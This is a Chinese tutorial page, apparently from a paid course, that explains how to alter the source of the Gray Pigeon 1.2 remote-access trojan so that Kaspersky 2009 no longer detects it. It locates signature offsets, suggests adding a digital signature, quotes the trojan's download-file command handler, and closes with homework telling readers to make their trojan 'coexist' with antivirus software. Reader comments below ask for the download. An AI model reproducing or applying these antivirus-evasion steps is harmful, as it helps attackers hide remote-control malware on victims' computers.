甲壳虫源码免杀VIP教程 第七课

初秋

【教程题目】源码免杀第七讲：灰鸽子1.2源代码简单修改过卡巴斯基2009

【教程目的】 用最简单和最快速的办法过掉杀毒软件

【教程工具】delphi 7.0，灰鸽子V1.2源代码，MYCCL,C32等

【编译环境】windowsXP SP3

【教程计划】
============================================================
（1）        定位特征码

特征码 物理地址/物理长度 如下:
[特征] 000BC250_00000002

[特征] 000C2CA0_00000002

教程免杀做的处理：加数字签名！（不加数字的话卡巴扫描时会真斯基（死机），

我之前做过测试的，也不知道是不是我的卡巴问题 o(∩_∩)o…）

思考：卡巴的启发查杀和如今的带沙盘的主动防御，一直是许多木马的拦路虎，

我们如何过掉它？卡巴脱壳强力是值得称赞的！但是卡巴对花指令就不敢恭维

了 呵呵，‘花’一直是卡巴的致命弱点。

准备：我们来到C32中看看是杀在什么地方——输入表，还有一处是什么呢？

我们暂时还不知道呢，先卖个关子。

（2）        对应源码中的修改

1） if StrTmpList[1]='074' then
   begin         {下载文件}
     try
       DomnFile:=TDownFileThread.Create(StrTmpList[2]);
     except
     end;
  end;

2）窗体改名
   
     简单吧 卡巴2009就这么过掉了！

OK！教程结束。。。
============================================================
【课后作业】

思考加实践！让杀毒软件和你的木马和平相处吧！！


甲壳虫免杀VIP教程   vip.jksing.com

长城汽车

不要迷恋哥，哥只是个打酱油的。

牧羊人

下载地址呢？？？